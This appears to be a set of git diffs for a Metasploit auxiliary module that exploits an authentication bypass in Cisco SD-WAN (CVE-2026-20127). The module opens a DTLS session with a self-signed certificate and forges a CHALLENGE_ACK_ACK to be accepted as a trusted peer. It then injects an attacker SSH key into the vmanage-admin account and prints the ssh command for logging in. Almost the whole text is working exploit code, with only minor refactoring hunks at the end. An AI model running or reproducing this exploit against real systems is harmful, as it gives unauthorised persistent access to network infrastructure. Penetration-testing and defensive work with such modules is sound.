+    print_status('Phase 2: Waiting for CHALLENGE from server') unless silent
+
+    hdr, body = recv_message(ssl, rbio, wbio, udp_sock, timeout: 15, silent: silent)
+    unless hdr
+      print_error('No CHALLENGE received from server') unless silent
+      return false
+    end
+
+    if hdr_msg_type(hdr) != MSG_CHALLENGE
+      print_error("Expected CHALLENGE (type=8), got #{msg_name(hdr_msg_type(hdr))} (type=#{hdr_msg_type(hdr)})") unless silent
+      return false
+    end
+
+    print_status("CHALLENGE received (#{body.bytesize} bytes of challenge data)") unless silent
+    true
+  end
+
+  def phase3_send_challenge_ack_ack(ssl, rbio, wbio, udp_sock, silent: false)
+    print_status('Phase 3: Sending CHALLENGE_ACK_ACK with verify_status=1') unless silent
+
+    # CHALLENGE_ACK_ACK body: verify_status=1, reserved=0
+    ack_ack_body = [0x01, 0x00].pack('CC')
+    send_message(ssl, wbio, udp_sock, MSG_CHALLENGE_ACK_ACK, ack_ack_body, silent: silent)
+
+    # Server may respond with Hello or TEAR_DOWN
+    hdr, _body = recv_message(ssl, rbio, wbio, udp_sock, timeout: 5, silent: silent)
+    if hdr
+      mtype = hdr_msg_type(hdr)
+      if mtype == MSG_HELLO
+        print_status('Server Hello received') unless silent
+      elsif mtype == MSG_TEAR_DOWN
+        print_error('TEAR_DOWN received - server rejected the forged ACK_ACK') unless silent
+        return false
+      else
+        print_status("Server responded with: #{msg_name(mtype)}") unless silent
+      end
+    else
+      vprint_status('No immediate response (server may be waiting for our Hello)') unless silent
+    end
+
+    true
+  end
+
+  def phase4_send_hello(ssl, rbio, wbio, udp_sock, silent: false)
+    print_status('Phase 4: Sending Hello as authenticated peer') unless silent
+
+    hello_body = build_hello_body
+    send_message(ssl, wbio, udp_sock, MSG_HELLO, hello_body, silent: silent)
+
+    hdr, _body = recv_message(ssl, rbio, wbio, udp_sock, timeout: 10, silent: silent)
+    if hdr
+      mtype = hdr_msg_type(hdr)
+      if mtype == MSG_HELLO
+        print_status('Hello response received - we are now a trusted peer') unless silent
+        return true
+      elsif mtype == MSG_TEAR_DOWN
+        print_warning('TEAR_DOWN received after Hello') unless silent
+      else
+        print_status("Server responded with: #{msg_name(mtype)}") unless silent
+      end
+    else
+      print_warning('No Hello response') unless silent
+    end
+
+    false
+  end
+
+  def phase5_ssh_key_inject(ssl, rbio, wbio, udp_sock, silent: false)
+    print_status('Phase 5: SSH key injection into vmanage-admin authorized_keys') unless silent
+
+    ssh_pubkey, ssh_privkey_pem = resolve_ssh_key(silent: silent)
+
+    # Build SSH key injection body (769 bytes)
+    key_body = build_ssh_inject_body(ssh_pubkey)
+
+    send_message(ssl, wbio, udp_sock, MSG_VMANAGE_TO_PEER, key_body, silent: silent)
+
+    privkey_path = nil
+
+    if datastore['SSH_PUBLIC_KEY_FILE']
+      # If we are using an existing key suplied by the user, just show how to connect to teh NETCONF service.
+      print_good("Use: ssh -i <SSH_PRIVATE_KEY_FILE> vmanage-admin@#{rhost} -p 830") unless silent
+    else
+      # If we generated a new key pain, store the private key as loot and write files
+      # Generate unique ID for filenames
+      key_id = "#{rhost}_#{rport}_#{Time.now.to_i}"
+
+      # Write SSH key files to STORE_SSH_KEY_FILES directory
+      if datastore['STORE_SSH_KEY_FILES']
+        begin
+          key_dir = datastore['STORE_SSH_KEY_FILES']
+          FileUtils.mkdir_p(key_dir) unless File.directory?(key_dir)
+
+          privkey_filename = "sdwan_ssh_key_#{key_id}"
+          pubkey_filename = "#{privkey_filename}.pub"
+          privkey_path = File.join(key_dir, privkey_filename)
+          pubkey_path = File.join(key_dir, pubkey_filename)
+
+          File.write(privkey_path, ssh_privkey_pem)
+          File.chmod(0o600, privkey_path)
+          File.write(pubkey_path, ssh_pubkey)
+
+          print_status("SSH private key saved to: #{privkey_path}") unless silent
+          print_status("SSH public key saved to: #{pubkey_path}") unless silent
+        rescue ::StandardError => e
+          print_error("Failed to write SSH key files: #{e.message}") unless silent
+        end
+      end
+
+      # Also store as loot (if database is available)
+      begin
+        loot_path = store_loot(
+          'cisco.sdwan.sshkey',
+          'application/x-pem-file',
+          rhost,
+          ssh_privkey_pem,
+          'sdwan_ssh_key.pem',
+          'SSH private key for vmanage-admin access'
+        )
+        print_status("SSH private key saved to loot: #{loot_path}") unless silent
+      rescue ::StandardError => e
+        vprint_status("Could not store loot (database may not be available): #{e.message}") unless silent
+      end
+
+      # Provide connection instructions
+      if privkey_path
+        print_good("Use: ssh -i #{privkey_path} vmanage-admin@#{rhost} -p 830") unless silent
+      else
+        print_good("Use: ssh -i <path_to_private_key> vmanage-admin@#{rhost} -p 830") unless silent
+      end
+    end
+
+    # Check for response
+    hdr, _body = recv_message(ssl, rbio, wbio, udp_sock, timeout: 5, silent: silent)
+    if hdr
+      mtype = hdr_msg_type(hdr)
+      if mtype == MSG_TEAR_DOWN
+        print_warning('TEAR_DOWN after key inject - key may still have been written') unless silent
+      else
+        print_status("Server responded with: #{msg_name(mtype)}") unless silent
+      end
+    else
+      vprint_status('No response to key injection (expected - server processes silently)') unless silent
+    end
+  end
+
+  #
+  # vDaemon Protocol encoding/decoding
+  #
+
+  MSG_HELLO = 0x05
+  MSG_CHALLENGE = 0x08
+  MSG_CHALLENGE_ACK_ACK = 0x0A
+  MSG_TEAR_DOWN = 0x0B
+  MSG_VMANAGE_TO_PEER = 0x0E
+
+  DEV_VSMART = 3
+
+  HDR_FLAGS = 0xA0
+
+  TLV_NUM_VSMARTS = 0x0021
+  TLV_NUM_VMANAGES = 0x0022
+
+  MSG_NAMES = {
+    0 => 'NEW_CHALLENGE_ACK',
+    1 => 'Register',
+    2 => 'msg2',
+    3 => 'msg3',
+    5 => 'Hello',
+    7 => 'Data',
+    8 => 'CHALLENGE',
+    9 => 'CHALLENGE_ACK',
+    10 => 'CHALLENGE_ACK_ACK',
+    11 => 'TEAR_DOWN',
+    12 => 'DELETE_VSMARTS_SERIAL',
+    13 => 'REGISTER_TO_VMANAGE',
+    14 => 'VMANAGE_TO_PEER',
+    15 => 'submsg'
+  }.freeze
+
+  def build_header(msg_type)
+    byte0 = msg_type & 0x0F # version=0
+    byte1 = (DEV_VSMART & 0x0F) << 4
+    domain_id = datastore['DOMAIN_ID']
+    site_id = datastore['SITE_ID']
+    [byte0, byte1, HDR_FLAGS, 0x00, domain_id, site_id].pack('CCCCN2')
+  end
+
+  def hdr_msg_type(hdr_bytes)
+    hdr_bytes.getbyte(0) & 0x0F
+  end
+
+  def msg_name(type)
+    MSG_NAMES.fetch(type) { format('Unknown(0x%02X)', type) }
+  end
+
+  def send_message(ssl, wbio, udp_sock, msg_type, body = ''.b, silent: false)
+    header = build_header(msg_type)
+    message = header + body
+    vprint_status("Sending #{msg_name(msg_type)} (#{message.bytesize} bytes)") unless silent
+    dtls_send(ssl, wbio, udp_sock, message)
+  end
+
+  def recv_message(ssl, rbio, wbio, udp_sock, timeout: 10, silent: false)
+    data = dtls_recv(ssl, rbio, wbio, udp_sock, timeout: timeout)
+    return [nil, nil] unless data
+    return [nil, nil] if data.bytesize < 12
+
+    hdr = data[0, 12]
+    body = data[12..] || ''.b
+    mtype = hdr_msg_type(hdr)
+    vprint_status("Received #{msg_name(mtype)} (#{data.bytesize} bytes)") unless silent
+    [hdr, body]
+  end
+
+  #
+  # Daemon Message body builders
+  #
+
+  def build_hello_body
+    buf = ''.b
+
+    # Preamble (4 bytes): is_dummy=false
+    buf << [0x00, 0x00, 0x00, 0x00].pack('CCCC')
+
+    # Address family: AF_INET
+    buf << [0x0002].pack('n')
+
+    # IP address (network byte order)
+    buf << IPAddr.new(datastore['RHOST'], Socket::AF_INET).hton
+
+    # Port
+    buf << [datastore['RPORT']].pack('n')
+
+    # Color
+    buf << [1].pack('N')
+
+    # Label/key padding (20 zero bytes)
+    buf << ("\x00" * 20)
+
+    # Timers
+    buf << [10_000, 60_000].pack('N2')
+
+    # TLV list
+    tlv_vsmarts = build_tlv(TLV_NUM_VSMARTS, [0x00].pack('C'))
+    tlv_vmanages = build_tlv(TLV_NUM_VMANAGES, [0x00].pack('C'))
+    buf << [2].pack('C') # TLV count
+    buf << tlv_vsmarts
+    buf << tlv_vmanages
+
+    buf
+  end
+
+  def build_tlv(type, value)
+    [type, value.bytesize].pack('n2') + value.b
+  end
+
+  def build_ssh_inject_body(ssh_pubkey)
+    key_buf = "\n".b + ssh_pubkey.b
+    key_buf << "\n".b unless key_buf.end_with?("\n".b)
+    key_buf << "\x00".b
+
+    if key_buf.bytesize < 768
+      key_buf << ("\x00".b * (768 - key_buf.bytesize))
+    end
+
+    # TLV count = 0
+    key_buf << [0].pack('C')
+
+    key_buf
+  end
+
+  #
+  # Certificate and SSH key generation helpers
+  #
+
+  def generate_self_signed_cert
+    key = OpenSSL::PKey::RSA.new(2048)
+
+    cert = OpenSSL::X509::Certificate.new
+    cert.version = 2
+    cert.serial = rand(1..0xFFFFFFFF)
+    cert.subject = OpenSSL::X509::Name.parse('/CN=/O=/C=')
+    cert.issuer = cert.subject
+    cert.public_key = key
+    cert.not_before = Time.now - 60
+    cert.not_after = Time.now + (365 * 86_400)
+
+    ef = OpenSSL::X509::ExtensionFactory.new
+    ef.subject_certificate = cert
+    ef.issuer_certificate = cert
+    cert.add_extension(ef.create_extension('basicConstraints', 'CA:TRUE', true))
+    cert.add_extension(ef.create_extension('subjectKeyIdentifier', 'hash'))
+    cert.add_extension(ef.create_extension('authorityKeyIdentifier', 'keyid:always,issuer:always'))
+
+    cert.sign(key, OpenSSL::Digest.new('SHA256'))
+
+    [cert.to_der, key.to_der]
+  end
+
+  def resolve_ssh_key(silent: false)
+    if datastore['SSH_PUBLIC_KEY_FILE']
+      pubkey = File.read(datastore['SSH_PUBLIC_KEY_FILE']).strip
+      print_status("Using SSH public key from #{datastore['SSH_PUBLIC_KEY_FILE']}") unless silent
+      return [pubkey, nil]
+    end
+
+    # Generate new RSA keypair
+    print_status('Generating RSA 2048-bit SSH keypair') unless silent
+    key = OpenSSL::PKey::RSA.new(2048)
+
+    pubkey_str = build_openssh_pubkey(key)
+    privkey_pem = key.to_pem
+
+    [pubkey_str, privkey_pem]
+  end
+
+  def build_openssh_pubkey(key)
+    e_bytes = bn_to_bytes(key.e)
+    n_bytes = bn_to_bytes(key.n)
+
+    # Prepend 0x00 if MSB is set (two's complement sign bit)
+    e_bytes = "\x00".b + e_bytes if e_bytes.getbyte(0) & 0x80 != 0
+    n_bytes = "\x00".b + n_bytes if n_bytes.getbyte(0) & 0x80 != 0
+
+    blob = ssh_string('ssh-rsa') + ssh_string(e_bytes) + ssh_string(n_bytes)
+    "ssh-rsa #{Base64.strict_encode64(blob)}"
+  end
+
+  def ssh_string(data)
+    data = data.b if data.respond_to?(:b)
+    [data.bytesize].pack('N') + data
+  end
+
+  def bn_to_bytes(bn)
+    hex = bn.to_s(16)
+    hex = "0#{hex}" if hex.length.odd?
+    [hex].pack('H*')
+  end
+
+  #
+  # DTLS transport (Fiddle/OpenSSL C API) helpers.
+  #
+  # We need this as Ruby does not support DTLS natively, and OpenSSL's Ruby bindings do not expose the
+  # necessary APIs for memory BIOs and custom handshakes.
+  #
+
+  # OpenSSL constants for Fiddle FFI
+  SSL_VERIFY_NONE = 0
+  EVP_PKEY_RSA = 6
+  SSL_ERROR_WANT_READ = 2
+  SSL_ERROR_WANT_WRITE = 3
+  SSL_ERROR_ZERO_RETURN = 6
+  BIO_CTRL_PENDING = 10
+  DTLS_CTRL_HANDLE_TIMEOUT = 106
+
+  HANDSHAKE_TIMEOUT = 5
+  MAX_HANDSHAKE_RETRIES = 10
+  RECV_BUF_SIZE = 65_536
+
+  def load_openssl_ffi(silent: false)
+    return if @ffi_loaded
+
+    libssl = load_native_lib('ssl')
+    libcrypto = load_native_lib('crypto')
+
+    # libssl functions
+    @f_dtls_client_method = bind_function(libssl, 'DTLS_client_method', [], Fiddle::TYPE_VOIDP)
+    @f_ssl_ctx_new = bind_function(libssl, 'SSL_CTX_new', [Fiddle::TYPE_VOIDP], Fiddle::TYPE_VOIDP)
+    @f_ssl_ctx_set_verify = bind_function(libssl, 'SSL_CTX_set_verify', [Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT, Fiddle::TYPE_VOIDP], Fiddle::TYPE_VOID)
+    @f_ssl_ctx_use_certificate_asn1 = bind_function(libssl, 'SSL_CTX_use_certificate_ASN1', [Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT, Fiddle::TYPE_VOIDP], Fiddle::TYPE_INT)
+    @f_ssl_ctx_use_privatekey_asn1 = bind_function(libssl, 'SSL_CTX_use_PrivateKey_ASN1', [Fiddle::TYPE_INT, Fiddle::TYPE_VOIDP, Fiddle::TYPE_VOIDP, Fiddle::TYPE_LONG], Fiddle::TYPE_INT)
+    @f_ssl_new = bind_function(libssl, 'SSL_new', [Fiddle::TYPE_VOIDP], Fiddle::TYPE_VOIDP)
+    @f_ssl_set_bio = bind_function(libssl, 'SSL_set_bio', [Fiddle::TYPE_VOIDP, Fiddle::TYPE_VOIDP, Fiddle::TYPE_VOIDP], Fiddle::TYPE_VOID)
+    @f_ssl_connect = bind_function(libssl, 'SSL_connect', [Fiddle::TYPE_VOIDP], Fiddle::TYPE_INT)
+    @f_ssl_read = bind_function(libssl, 'SSL_read', [Fiddle::TYPE_VOIDP, Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT], Fiddle::TYPE_INT)
+    @f_ssl_write = bind_function(libssl, 'SSL_write', [Fiddle::TYPE_VOIDP, Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT], Fiddle::TYPE_INT)
+    @f_ssl_get_error = bind_function(libssl, 'SSL_get_error', [Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT], Fiddle::TYPE_INT)
+    @f_ssl_free = bind_function(libssl, 'SSL_free', [Fiddle::TYPE_VOIDP], Fiddle::TYPE_VOID)
+    @f_ssl_ctx_free = bind_function(libssl, 'SSL_CTX_free', [Fiddle::TYPE_VOIDP], Fiddle::TYPE_VOID)
+    @f_ssl_ctrl = bind_function(libssl, 'SSL_ctrl', [Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT, Fiddle::TYPE_LONG, Fiddle::TYPE_VOIDP], Fiddle::TYPE_LONG)
+
+    # libcrypto functions
+    @f_bio_new = bind_function(libcrypto, 'BIO_new', [Fiddle::TYPE_VOIDP], Fiddle::TYPE_VOIDP)
+    @f_bio_s_mem = bind_function(libcrypto, 'BIO_s_mem', [], Fiddle::TYPE_VOIDP)
+    @f_bio_read = bind_function(libcrypto, 'BIO_read', [Fiddle::TYPE_VOIDP, Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT], Fiddle::TYPE_INT)
+    @f_bio_write = bind_function(libcrypto, 'BIO_write', [Fiddle::TYPE_VOIDP, Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT], Fiddle::TYPE_INT)
+    @f_bio_ctrl = bind_function(libcrypto, 'BIO_ctrl', [Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT, Fiddle::TYPE_LONG, Fiddle::TYPE_VOIDP], Fiddle::TYPE_LONG)
+    @f_err_clear_error = bind_function(libcrypto, 'ERR_clear_error', [], Fiddle::TYPE_VOID)
+    @f_err_get_error = bind_function(libcrypto, 'ERR_get_error', [], Fiddle::TYPE_LONG)
+    @f_err_error_string_n = bind_function(libcrypto, 'ERR_error_string_n', [Fiddle::TYPE_LONG, Fiddle::TYPE_VOIDP, Fiddle::TYPE_SIZE_T], Fiddle::TYPE_VOID)
+
+    @recv_buf = Fiddle::Pointer.malloc(RECV_BUF_SIZE, Fiddle::RUBY_FREE)
+    @ffi_loaded = true
+
+    vprint_status('OpenSSL FFI bindings loaded successfully') unless silent
+  end
+
+  def load_native_lib(name)
+    candidates = case RUBY_PLATFORM
+                 when /mingw|mswin|cygwin/
+                   %W[libssl-3-x64.dll libssl-3.dll lib#{name}]
+                 when /darwin/
+                   %W[
+                     lib#{name}.dylib
+                     /usr/local/opt/openssl/lib/lib#{name}.dylib
+                     /opt/homebrew/opt/openssl/lib/lib#{name}.dylib
+                   ]
+                 else
+                   %W[lib#{name}.so]
+                 end
+
+    candidates.each do |path|
+      return Fiddle.dlopen(path)
+    rescue Fiddle::DLError
+      next
+    end
+    fail_with(Failure::NotFound, "Cannot find lib#{name}. Ensure OpenSSL is installed.")
+  end
+
+  def bind_function(lib, name, args, ret)
+    Fiddle::Function.new(lib[name], args, ret)
+  end
+
+  def bio_ctrl_pending(bio)
+    @f_bio_ctrl.call(bio, BIO_CTRL_PENDING, 0, Fiddle::NULL)
+  end
+
+  def handle_dtls_timeout(ssl)
+    @f_ssl_ctrl.call(ssl, DTLS_CTRL_HANDLE_TIMEOUT, 0, Fiddle::NULL)
+  end
+
+  def drain_openssl_errors
+    msgs = []
+    loop do
+      code = @f_err_get_error.call
+      break if code == 0
+
+      buf = Fiddle::Pointer.malloc(256, Fiddle::RUBY_FREE)
+      @f_err_error_string_n.call(code, buf, 256)
+      msgs << buf.to_s
+    end
+    msgs
+  end
+
+  # Drive the DTLS handshake state machine, shuttling data between the
+  # SSL engine and the UDP socket via memory BIOs.
+  def do_dtls_handshake(ssl, rbio, wbio, udp_sock)
+    retries = 0
+
+    loop do
+      @f_err_clear_error.call
+      ret = @f_ssl_connect.call(ssl)
+      flush_wbio(wbio, udp_sock)
+
+      break if ret == 1
+
+      err = @f_ssl_get_error.call(ssl, ret)
+      case err
+      when SSL_ERROR_WANT_READ
+        ready = ::IO.select([udp_sock], nil, nil, HANDSHAKE_TIMEOUT)
+        if ready
+          begin
+            dgram = udp_sock.recvfrom(65_536)[0]
+            @f_bio_write.call(rbio, dgram, dgram.bytesize)
+          rescue ::IO::WaitReadable
+            retries += 1
+            fail_with(Failure::Unreachable, "DTLS handshake timeout after #{retries} retries") if retries > MAX_HANDSHAKE_RETRIES
+
+            handle_dtls_timeout(ssl)
+            flush_wbio(wbio, udp_sock)
+          end
+        else
+          retries += 1
+          fail_with(Failure::Unreachable, "DTLS handshake timeout after #{retries} retries") if retries > MAX_HANDSHAKE_RETRIES
+
+          handle_dtls_timeout(ssl)
+          flush_wbio(wbio, udp_sock)
+        end
+      when SSL_ERROR_WANT_WRITE
+        flush_wbio(wbio, udp_sock)
+      else
+        errors = drain_openssl_errors
+        fail_with(Failure::Unknown, "DTLS handshake failed (SSL error #{err}): #{errors.join('; ')}")
+      end
+    end
+  end
+
+  def flush_wbio(wbio, udp_sock)
+    loop do
+      pending = bio_ctrl_pending(wbio)
+      break if pending <= 0
+
+      buf = Fiddle::Pointer.malloc(pending, Fiddle::RUBY_FREE)
+      n = @f_bio_read.call(wbio, buf, pending)
+      break if n <= 0
+
+      udp_sock.write(buf.to_str(n))
+    end
+  end
+
+  def dtls_send(ssl, wbio, udp_sock, data)
+    @f_err_clear_error.call
+    ret = @f_ssl_write.call(ssl, data, data.bytesize)
+    if ret <= 0
+      err = @f_ssl_get_error.call(ssl, ret)
+      errors = drain_openssl_errors
+      fail_with(Failure::Unknown, "SSL_write failed (error #{err}): #{errors.join('; ')}")
+    end
+    flush_wbio(wbio, udp_sock)
+    ret
+  end
+
+  def dtls_recv(ssl, rbio, _wbio, udp_sock, timeout: 10)
+    ready = ::IO.select([udp_sock], nil, nil, timeout)
+    return nil unless ready
+
+    begin
+      dgram = udp_sock.recvfrom(65_536)[0]
+    rescue ::IO::WaitReadable
+      return nil
+    end
+
+    @f_bio_write.call(rbio, dgram, dgram.bytesize)
+
+    @f_err_clear_error.call
+    ret = @f_ssl_read.call(ssl, @recv_buf, RECV_BUF_SIZE)
+    if ret <= 0
+      err = @f_ssl_get_error.call(ssl, ret)
+      return nil if err == SSL_ERROR_WANT_READ
+
+      vprint_status("SSL_read error: #{err}")
+      return nil
+    end
+
+    @recv_buf.to_str(ret).b
+  end
+
+  def cleanup_dtls(ssl, ctx, udp_sock)
+    if ssl
+      begin
+        @f_ssl_free.call(ssl)
+      rescue ::StandardError
+        nil
+      end
+    end
+
+    if ctx
+      begin
+        @f_ssl_ctx_free.call(ctx)
+      rescue ::StandardError
+        nil
+      end
+    end
+
+    begin
+      udp_sock&.close
+    rescue ::StandardError
+      nil
+    end
+  end
+
+end

--- a/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.rb
+++ b/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.rb
@@ -588,9 +588,12 @@ class MetasploitModule < Msf::Auxiliary
                    %W[libssl-3-x64.dll libssl-3.dll lib#{name}]
                  when /darwin/
                    %W[
-                     lib#{name}.dylib
+                     /usr/local/opt/openssl@3/lib/lib#{name}.3.dylib
                      /usr/local/opt/openssl/lib/lib#{name}.dylib
+                     /opt/homebrew/opt/openssl@3/lib/lib#{name}.3.dylib
                      /opt/homebrew/opt/openssl/lib/lib#{name}.dylib
+                     /opt/local/lib/lib#{name}.3.dylib
+                     /opt/local/lib/lib#{name}.dylib      
                    ]
                  else
                    %W[lib#{name}.so]

--- a/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.rb
+++ b/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.rb
@@ -585,7 +585,17 @@ class MetasploitModule < Msf::Auxiliary
   def load_native_lib(name)
     candidates = case RUBY_PLATFORM
                  when /mingw|mswin|cygwin/
-                   %W[libssl-3-x64.dll libssl-3.dll lib#{name}]
+                   bin = RbConfig::CONFIG['bindir']
+                   arch_dir = RbConfig::CONFIG['archdir']
+                   site_arch = RbConfig::CONFIG['sitearchdir']
+                   paths = []
+                   [arch_dir, site_arch, bin].compact.uniq.each do |dir|
+                     paths << "#{dir}/lib#{name}-3-x64.dll"
+                     paths << "#{dir}/lib#{name}-3.dll"
+                     paths << "#{dir}/lib#{name}-1_1-x64.dll"
+                   end
+                   paths += %W[lib#{name}-3-x64 lib#{name}-3 lib#{name}]
+                   paths
                  when /darwin/
                    %W[
                      /usr/local/opt/openssl@3/lib/lib#{name}.3.dylib

--- a/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.rb
+++ b/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.rb
@@ -38,13 +38,11 @@ class MetasploitModule < Msf::Auxiliary
         'Author' => ['sfewer-r7'],
         'License' => MSF_LICENSE,
         'References' => [
-          [
-            'CVE', '2026-20127',
-            'URL', 'https://github.com/sfewer-r7/CVE-2026-20127', # PoC
-            'URL', 'https://attackerkb.com/topics/bP3FMvHe7z/cve-2026-20127/rapid7-analysis', # Technical Analysis
-            'URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa-EHchtZk', # Vendor advisory
-            'URL', 'https://blog.talosintelligence.com/uat-8616-sd-wan/' # Additional advisory from Cisco Talos
-          ]
+          ['CVE', '2026-20127'],
+          ['URL', 'https://github.com/sfewer-r7/CVE-2026-20127'], # PoC
+          ['URL', 'https://attackerkb.com/topics/bP3FMvHe7z/cve-2026-20127/rapid7-analysis'], # Technical Analysis
+          ['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa-EHchtZk'], # Vendor advisory
+          ['URL', 'https://blog.talosintelligence.com/uat-8616-sd-wan/'] # Additional advisory from Cisco Talos
         ],
         'DisclosureDate' => '2026-02-25',
         'Notes' => {

--- a/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.rb
+++ b/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.rb
@@ -119,7 +119,7 @@ class MetasploitModule < Msf::Auxiliary
   def phase1_dtls_handshake(silent: false)
     print_status('Phase 1: DTLS handshake with self-signed certificate') unless silent
 
-    load_openssl_ffi(silent: silent)
+    load_openssl_ffi
 
     # Generate self-signed certificate (in-memory, no files written to disk)
     cert_der, key_der = generate_self_signed_cert
@@ -180,7 +180,7 @@ class MetasploitModule < Msf::Auxiliary
   def phase2_receive_challenge(ssl, rbio, wbio, udp_sock, silent: false)
     print_status('Phase 2: Waiting for CHALLENGE from server') unless silent
 
-    hdr, body = recv_message(ssl, rbio, wbio, udp_sock, timeout: 15, silent: silent)
+    hdr, body = recv_message(ssl, rbio, wbio, udp_sock, timeout: 15)
     unless hdr
       print_error('No CHALLENGE received from server') unless silent
       return false
@@ -200,10 +200,10 @@ class MetasploitModule < Msf::Auxiliary
 
     # CHALLENGE_ACK_ACK body: verify_status=1, reserved=0
     ack_ack_body = [0x01, 0x00].pack('CC')
-    send_message(ssl, wbio, udp_sock, MSG_CHALLENGE_ACK_ACK, ack_ack_body, silent: silent)
+    send_message(ssl, wbio, udp_sock, MSG_CHALLENGE_ACK_ACK, ack_ack_body)
 
     # Server may respond with Hello or TEAR_DOWN
-    hdr, _body = recv_message(ssl, rbio, wbio, udp_sock, timeout: 5, silent: silent)
+    hdr, _body = recv_message(ssl, rbio, wbio, udp_sock, timeout: 5)
     if hdr
       mtype = hdr_msg_type(hdr)
       if mtype == MSG_HELLO
@@ -215,7 +215,7 @@ class MetasploitModule < Msf::Auxiliary
         print_status("Server responded with: #{msg_name(mtype)}") unless silent
       end
     else
-      vprint_status('No immediate response (server may be waiting for our Hello)') unless silent
+      print_warning('No immediate response (server may be waiting for our Hello)') unless silent
     end
 
     true
@@ -225,9 +225,9 @@ class MetasploitModule < Msf::Auxiliary
     print_status('Phase 4: Sending Hello as authenticated peer') unless silent
 
     hello_body = build_hello_body
-    send_message(ssl, wbio, udp_sock, MSG_HELLO, hello_body, silent: silent)
+    send_message(ssl, wbio, udp_sock, MSG_HELLO, hello_body)
 
-    hdr, _body = recv_message(ssl, rbio, wbio, udp_sock, timeout: 10, silent: silent)
+    hdr, _body = recv_message(ssl, rbio, wbio, udp_sock, timeout: 10)
     if hdr
       mtype = hdr_msg_type(hdr)
       if mtype == MSG_HELLO
@@ -236,7 +236,7 @@ class MetasploitModule < Msf::Auxiliary
       elsif mtype == MSG_TEAR_DOWN
         print_warning('TEAR_DOWN received after Hello') unless silent
       else
-        print_status("Server responded with: #{msg_name(mtype)}") unless silent
+        print_warning("Server responded with: #{msg_name(mtype)}") unless silent
       end
     else
       print_warning('No Hello response') unless silent
@@ -253,7 +253,7 @@ class MetasploitModule < Msf::Auxiliary
     # Build SSH key injection body (769 bytes)
     key_body = build_ssh_inject_body(ssh_pubkey)
 
-    send_message(ssl, wbio, udp_sock, MSG_VMANAGE_TO_PEER, key_body, silent: silent)
+    send_message(ssl, wbio, udp_sock, MSG_VMANAGE_TO_PEER, key_body)
 
     if datastore['SSH_PUBLIC_KEY_FILE']
       # If we are using an existing key supplied by the user, just show how to connect to the NETCONF service.
@@ -279,16 +279,16 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     # Check for response
-    hdr, _body = recv_message(ssl, rbio, wbio, udp_sock, timeout: 5, silent: silent)
+    hdr, _body = recv_message(ssl, rbio, wbio, udp_sock, timeout: 5)
     if hdr
       mtype = hdr_msg_type(hdr)
-      if mtype == MSG_TEAR_DOWN
-        print_warning('TEAR_DOWN after key inject - key may still have been written') unless silent
+      if mtype == MSG_REGISTER_TO_VMANAGE
+        print_status('Server responded with: REGISTER_TO_VMANAGE (key has been injected)') unless silent
       else
-        print_status("Server responded with: #{msg_name(mtype)}") unless silent
+        print_warning("Server responded with: #{msg_name(mtype)}") unless silent
       end
     else
-      vprint_status('No response to key injection (expected - server processes silently)') unless silent
+      print_warning('No response to key injection') unless silent
     end
   end
 
@@ -300,6 +300,7 @@ class MetasploitModule < Msf::Auxiliary
   MSG_CHALLENGE = 0x08
   MSG_CHALLENGE_ACK_ACK = 0x0A
   MSG_TEAR_DOWN = 0x0B
+  MSG_REGISTER_TO_VMANAGE = 0xD
   MSG_VMANAGE_TO_PEER = 0x0E
 
   DEV_VSMART = 3
@@ -342,14 +343,14 @@ class MetasploitModule < Msf::Auxiliary
     MSG_NAMES.fetch(type) { format('Unknown(0x%02X)', type) }
   end
 
-  def send_message(ssl, wbio, udp_sock, msg_type, body = ''.b, silent: false)
+  def send_message(ssl, wbio, udp_sock, msg_type, body = ''.b)
     header = build_header(msg_type)
     message = header + body
-    vprint_status("Sending #{msg_name(msg_type)} (#{message.bytesize} bytes)") unless silent
+    vprint_status("Sending #{msg_name(msg_type)} (#{message.bytesize} bytes)")
     dtls_send(ssl, wbio, udp_sock, message)
   end
 
-  def recv_message(ssl, rbio, wbio, udp_sock, timeout: 10, silent: false)
+  def recv_message(ssl, rbio, wbio, udp_sock, timeout: 10)
     data = dtls_recv(ssl, rbio, wbio, udp_sock, timeout: timeout)
     return [nil, nil] unless data
     return [nil, nil] if data.bytesize < 12
@@ -357,7 +358,7 @@ class MetasploitModule < Msf::Auxiliary
     hdr = data[0, 12]
     body = data[12..] || ''.b
     mtype = hdr_msg_type(hdr)
-    vprint_status("Received #{msg_name(mtype)} (#{data.bytesize} bytes)") unless silent
+    vprint_status("Received #{msg_name(mtype)} (#{data.bytesize} bytes)")
     [hdr, body]
   end
 
@@ -503,7 +504,7 @@ class MetasploitModule < Msf::Auxiliary
   MAX_HANDSHAKE_RETRIES = 10
   RECV_BUF_SIZE = 65_536
 
-  def load_openssl_ffi(silent: false)
+  def load_openssl_ffi
     return if @ffi_loaded
 
     libssl = load_native_lib('ssl')
@@ -538,7 +539,7 @@ class MetasploitModule < Msf::Auxiliary
     @recv_buf = Fiddle::Pointer.malloc(RECV_BUF_SIZE, Fiddle::RUBY_FREE)
     @ffi_loaded = true
 
-    vprint_status('OpenSSL FFI bindings loaded successfully') unless silent
+    vprint_status('OpenSSL FFI bindings loaded successfully')
   end
 
   def load_native_lib(name)

--- a/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.rb
+++ b/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.rb
@@ -262,8 +262,8 @@ class MetasploitModule < Msf::Auxiliary
